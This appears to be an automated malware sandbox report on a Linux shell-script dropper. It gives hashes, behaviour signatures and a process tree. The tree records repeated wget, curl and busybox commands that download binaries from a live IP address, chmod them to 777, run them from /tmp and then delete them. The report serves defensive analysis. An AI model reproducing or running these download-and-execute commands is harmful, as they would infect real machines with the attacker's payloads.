Analysis
-
max time kernel
61s -
max time network
62s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
01-11-2024 02:32
Static task
static1
Behavioral task
behavioral1
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
-
Size
10KB
-
MD5
0e701247eed8c2ac85ce4310d37e674d
-
SHA1
7ca0caf639c6d80baffe549e24e3018daaa8bbb8
-
SHA256
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb
-
SHA512
0ef0aa05143b180e5260a49f2e87ebca0ecec3ab767bbbc7bc0761a2244b20b000aaffead5bd57071f0022821063d4c4ae9bb2efac893131009c19b2f57f556b
-
SSDEEP
96:PBRELvNSsmyUgEmy+bytMKk99ch83tkBRELvFSsQZFWyLJBmy+bytMs799chtE37:Y1myUgE5CVS3n
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 935 chmod 947 chmod 965 chmod 774 chmod 805 chmod 837 chmod 911 chmod 812 chmod 818 chmod 977 chmod 875 chmod 899 chmod 923 chmod 860 chmod 905 chmod 941 chmod 953 chmod 887 chmod 917 chmod 737 chmod 743 chmod 869 chmod 893 chmod 749 chmod 929 chmod 959 chmod 971 chmod 881 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m 738 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s 744 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 750 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys 776 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh 806 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 813 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK 819 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do 838 oieViux5SkcOflukQEESWqzwe8qoXmU0do /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT 861 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq 870 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH 876 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb 882 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV 888 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA 894 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m 900 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s 906 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 912 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 918 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK 924 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do 930 oieViux5SkcOflukQEESWqzwe8qoXmU0do /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys 936 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh 942 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT 948 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb 954 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV 960 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA 966 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq 972 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH 978 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq curl File opened for modification /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH curl File opened for modification /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 curl File opened for modification /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do curl File opened for modification /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s curl File opened for modification /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK curl File opened for modification /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT curl File opened for modification /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH curl File opened for modification /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do curl File opened for modification /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh curl File opened for modification /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m curl File opened for modification /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys curl File opened for modification /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA curl File opened for modification /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq curl File opened for modification /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh curl File opened for modification /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 curl File opened for modification /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT curl File opened for modification /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s curl File opened for modification /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys curl File opened for modification /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK curl File opened for modification /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 curl File opened for modification /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m curl File opened for modification /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb curl File opened for modification /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV curl File opened for modification /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb curl File opened for modification /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 curl File opened for modification /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV curl File opened for modification /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA curl
Processes
-
/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:714
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:717
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:736
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:739
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:740
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:742
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:745
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:746
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:748
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:768
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:778
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:780
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:800
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:809
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:811
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:817
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:820
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:831
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:858
-
-
/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:868
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:874
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:880
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:886
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:892
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:898
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:904
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:910
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:916
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:922
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:928
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:934
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:937
-
-
